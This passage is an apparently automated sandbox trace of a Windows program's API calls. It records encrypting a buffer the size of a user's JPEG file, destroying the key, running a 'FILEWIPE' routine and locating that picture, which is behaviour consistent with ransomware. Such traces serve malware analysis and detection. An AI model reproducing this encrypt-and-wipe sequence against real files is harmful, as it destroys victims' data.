0x11 [0040.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.112] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.112] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0040.113] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.113] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x942db0*, pdwDataLen=0x6ae220*=0xdda0, dwBufLen=0xddb0 | out: pbData=0x942db0*, pdwDataLen=0x6ae220*=0xddb0) returned 1 [0040.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.113] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0040.113] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.115] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.115] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.115] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.115] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0040.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.115] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.115] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0040.115] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.115] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0040.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.115] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889508 | out: hHeap=0x770000) returned 1 [0040.115] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.116] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0040.116] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0040.116] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.116] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0040.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.116] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0040.116] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.119] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.119] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.119] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0040.119] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.123] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.123] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.123] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0040.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.123] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.123] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.123] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0040.123] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.123] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0040.123] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.123] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.123] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0040.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.123] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.123] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.123] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0040.124] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.124] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0040.124] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0040.124] PeekMessageW (in: lpMsg=0x6ae3d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3d4) returned 0 [0040.124] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.124] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0040.124] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.124] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0040.124] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.124] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.124] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.124] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.124] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.124] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.124] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0040.125] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.125] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.125] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0040.125] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.125] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.125] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.125] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0040.125] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.125] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0040.125] CryptReleaseContext (hProv=0x7d5bb8, dwFlags=0x0) returned 1 [0040.125] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.125] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0040.125] PeekMessageW (in: lpMsg=0x6ae6e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6e4) returned 0 [0040.125] FreeLibrary (hLibModule=0x754b0000) returned 1 [0040.125] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0040.126] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0040.126] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0040.126] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.126] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.126] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.126] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.127] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0040.127] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0040.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0040.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0040.127] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.127] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\oaCi\\4hhX5h uJXBt\\A-rPtL9RGZL\\eQssAfKs-mGDt6Pjw\\ZFzFoo26_z1.jpg", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x304524a0, ftCreationTime.dwHighDateTime=0x1d5bcc3, ftLastAccessTime.dwLowDateTime=0x6caaa870, ftLastAccessTime.dwHighDateTime=0x1d5be12, ftLastWriteTime.dwLowDateTime=0x6caaa870, ftLastWriteTime.dwHighDateTime=0x1d5be12, nFileSizeHigh=0x0, nFileSizeLow=0xdda0, dwReserved0=0x0, dwReserved1=0x777648, cFileName="ZFzFoo26_z1.jpg", cAlternateFileName="ZFZFOO~1.JPG")) returned 0x7c2240 [0040.127] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0040.127] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0040.128] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.128] CharLowerBuffW (in: lpsz="byte[56736]", cchLength=0xb | out: lpsz="byte[56736]") returned 0xb [0040.128] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.128] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af478 | out: hHeap=0x770000) returned 1 [0040.128] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.128] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0040.128] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0040.128] FreeLibrary (hLibModule=0x76b40000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b48 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1918 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897f0 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889958 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c988 | out: hHeap=0x770000) returned 1 [0040.128] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889610 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c7f0 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889778 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c970 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0040.129] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0040.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.129] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0040.129] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0040.129] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0040.129] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.129] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.129] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0040.130] PeekMessageW (in: 